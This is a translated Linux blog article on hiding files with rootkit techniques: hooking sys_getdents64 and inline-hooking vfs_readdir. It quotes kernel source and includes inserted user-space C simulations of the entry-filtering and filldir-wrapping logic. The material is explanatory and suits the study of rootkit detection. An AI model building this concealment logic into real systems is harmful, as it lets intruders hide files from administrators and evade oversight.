A New Method for hiding files in Linux

Source: Internet
Author: User
Originally published on the Linux channel of IT Lab (China), which covers desktop applications, Linux system administration, kernel research, embedded systems and open source.

1. Overview

The common method of hiding files today is to hook the sys_getdents64 system call: the hook first calls the original sys_getdents64 and then strips the entries to be hidden from the buffer it filled. Patching sys_call_table for this is a fairly primitive rootkit technique, and a capable administrator can detect it, for example by comparing the live table against the symbols in vmlinux with gdb. Being more covert means looking for a new approach. Inline hooking is also widely used and is harder to detect. This article describes a method of hiding files by inline-hooking a function inside the kernel.
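To make the classic approach concrete, here is an added user-space example (not code from the article or its author) of the buffer-filtering step: it builds a struct linux_dirent64 buffer by hand, the way the original system call would have filled it, and removes every entry whose name starts with an assumed prefix, "rk_", returning the shortened byte count the hook would hand back to user space. The struct layout follows the kernel's; the directory contents and the prefix are constructed for the example.

```c
/* Added example: the buffer-filtering step of the classic getdents64 hook,
 * rebuilt in user space so it can be run without a kernel module.
 * The struct layout mirrors the kernel's struct linux_dirent64; the buffer
 * contents below are constructed by hand, not captured from a real directory. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

struct linux_dirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

/* Names beginning with this prefix are hidden (assumption for the example). */
#define HIDE_PREFIX "rk_"

/* Record length as filldir64 computes it: header + name + NUL, 8-byte aligned. */
static size_t reclen_for(const char *name)
{
    size_t n = offsetof(struct linux_dirent64, d_name) + strlen(name) + 1;
    return (n + 7) & ~(size_t)7;
}

/* Append one record to buf; returns bytes written (0 if it does not fit). */
static size_t put_dirent(char *buf, size_t cap, uint64_t ino, const char *name)
{
    size_t len = reclen_for(name);
    if (len > cap)
        return 0;
    struct linux_dirent64 *d = (struct linux_dirent64 *)buf;
    memset(buf, 0, len);
    d->d_ino = ino;
    d->d_reclen = (uint16_t)len;
    d->d_type = 8; /* DT_REG */
    strcpy(d->d_name, name);
    return len;
}

/* The filter a hooked sys_getdents64 applies after calling the original:
 * walk the records by d_reclen, memmove later records over any entry whose
 * name begins with HIDE_PREFIX, and return the shrunken byte count that the
 * hook returns to user space in place of the original count. */
long hide_entries(char *buf, long nread)
{
    long pos = 0;
    while (pos < nread) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);
        long len = d->d_reclen;
        if (len == 0 || pos + len > nread)
            break; /* malformed record: stop rather than run off the buffer */
        if (strncmp(d->d_name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0) {
            memmove(buf + pos, buf + pos + len, (size_t)(nread - pos - len));
            nread -= len;
            continue; /* re-examine whatever record now sits at pos */
        }
        pos += len;
    }
    return nread;
}

/* Number of records in a buffer (used to check the result). */
int count_entries(const char *buf, long nread)
{
    int n = 0;
    for (long pos = 0; pos < nread; n++) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + pos);
        if (d->d_reclen == 0)
            break;
        pos += d->d_reclen;
    }
    return n;
}

/* Builds a constructed five-entry listing, filters it, and returns how many
 * records remain. The hidden name at the very end exercises the tail case. */
int demo_hide(void)
{
    static char buf[512];
    size_t used = 0;
    const char *names[] = { ".", "..", "rk_loader.ko", "notes.txt", "rk_log" };
    for (size_t i = 0; i < sizeof names / sizeof *names; i++)
        used += put_dirent(buf + used, sizeof buf - used, 100 + i, names[i]);
    long after = hide_entries(buf, (long)used);
    return count_entries(buf, after);
}
```

The two details that usually go wrong in real hooks are visible here: the walk must advance by d_reclen rather than by sizeof the struct, and the return value handed back to user space must be the reduced length, otherwise the caller parses stale bytes past the last surviving record.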

2. Analyzing the sys_getdents64 system call

To hide a file you still have to start from the sys_getdents64 system call, so let us look at how the kernel implements it. The code is in linux-2.6.26/fs/readdir.c:

asmlinkage long sys_getdents64(unsigned int fd, struct linux_dirent64 __user *dirent, unsigned int count)
{
    struct file *file;
    struct linux_dirent64 __user *lastdirent;
    struct getdents_callback64 buf;
    int error;

    error = -EFAULT;
    if (!access_ok(VERIFY_WRITE, dirent, count))
        goto out;

    error = -EBADF;
    file = fget(fd);
    if (!file)
        goto out;

    buf.current_dir = dirent;
    buf.previous = NULL;
    buf.count = count;
    buf.error = 0;

    error = vfs_readdir(file, filldir64, &buf);
    if (error < 0)
        goto out_putf;
    error = buf.error;
    lastdirent = buf.previous;
    if (lastdirent) {
        typeof(lastdirent->d_off) d_off = file->f_pos;
        error = -EFAULT;
        if (__put_user(d_off, &lastdirent->d_off))
            goto out_putf;
        error = count - buf.count;
    }

out_putf:
    fput(file);
out:
    return error;
}

First, access_ok checks that the user-space range dirent..dirent+count is a valid, writable user address range. Then fget looks up the struct file that belongs to fd. After that the getdents_callback64 structure buf is filled in with the user buffer pointer and its size; the details do not matter here, so let us look further down.
vfs_readdir(file, filldir64, &buf);
So the system call ultimately obtains the directory listing by calling vfs_readdir at the VFS layer, passing filldir64 as the callback that copies each entry into the user buffer. Can we therefore hide files by hooking vfs_readdir instead of the system call? Let us follow vfs_readdir further to see whether this idea is feasible.
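As an added illustration of what a hook at this level can do (this is not the article's hook code, which is not on this page, and the mechanism is assumed), the following user-space simulation wraps the filldir callback: the hooked vfs_readdir substitutes its own filler, which drops names with an assumed "rk_" prefix and forwards everything else to the caller's original filldir and buffer. The directory listing and the stand-in vfs_readdir are constructed for the example.

```c
/* Added example: hiding entries at the vfs_readdir level by wrapping the
 * filldir callback instead of rewriting the user buffer afterwards.
 * User-space simulation; the "directory" below is constructed, and the
 * hooking mechanism is assumed for illustration, not taken from the article. */
#include <string.h>
#include <stddef.h>

/* Same shape as the kernel's filldir_t in 2.6-era kernels. */
typedef int (*filldir_t)(void *buf, const char *name, int namlen,
                         long long offset, unsigned long long ino, unsigned d_type);

/* Stand-in for the real file and vfs_readdir: iterates a fixed listing. */
struct fake_dir { const char **names; int n; };

static int fake_vfs_readdir(struct fake_dir *dir, filldir_t filler, void *buf)
{
    for (int i = 0; i < dir->n; i++) {
        if (filler(buf, dir->names[i], (int)strlen(dir->names[i]),
                   i + 1, 1000ULL + (unsigned long long)i, 8) != 0)
            return 0; /* non-zero from the filler means "buffer full": stop */
    }
    return 0;
}

/* What the hook keeps across the wrapped call: the real filler and its buf. */
struct hook_ctx { filldir_t orig_filldir; void *orig_buf; };

#define HIDE_PREFIX "rk_"

/* Wrapper callback: swallow hidden names, forward everything else unchanged. */
static int hiding_filldir(void *ctx_, const char *name, int namlen,
                          long long offset, unsigned long long ino, unsigned d_type)
{
    struct hook_ctx *ctx = ctx_;
    int plen = (int)strlen(HIDE_PREFIX);
    if (namlen >= plen && strncmp(name, HIDE_PREFIX, (size_t)plen) == 0)
        return 0; /* 0 = "continue"; the original filler never sees this entry */
    return ctx->orig_filldir(ctx->orig_buf, name, namlen, offset, ino, d_type);
}

/* The hooked vfs_readdir: same contract, but with the callback substituted. */
int hooked_vfs_readdir(struct fake_dir *dir, filldir_t filler, void *buf)
{
    struct hook_ctx ctx = { filler, buf };
    return fake_vfs_readdir(dir, hiding_filldir, &ctx);
}

/* A caller's filler that just counts what reaches it (stands in for filldir64). */
struct count_buf { int seen; int rk_seen; };

static int counting_filldir(void *buf, const char *name, int namlen,
                            long long offset, unsigned long long ino, unsigned d_type)
{
    (void)offset; (void)ino; (void)d_type;
    struct count_buf *cb = buf;
    cb->seen++;
    if (namlen >= 3 && strncmp(name, "rk_", 3) == 0)
        cb->rk_seen++;
    return 0;
}

/* Runs a constructed listing through the hook and returns how many entries
 * the caller received, or -1 if any hidden name leaked through. */
int demo_hooked_listing(void)
{
    const char *names[] = { ".", "..", "rk_loader.ko", "notes.txt", "rk_log" };
    struct fake_dir dir = { names, 5 };
    struct count_buf cb = { 0, 0 };
    hooked_vfs_readdir(&dir, counting_filldir, &cb);
    return cb.rk_seen == 0 ? cb.seen : -1;
}
```

Compared with post-filtering the user buffer, this approach never has to re-parse linux_dirent64 records or fix up the returned byte count, because the hidden entries are simply never copied out; the price is that the hook has to sit where the callback is passed, which is exactly why vfs_readdir is the interesting target.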

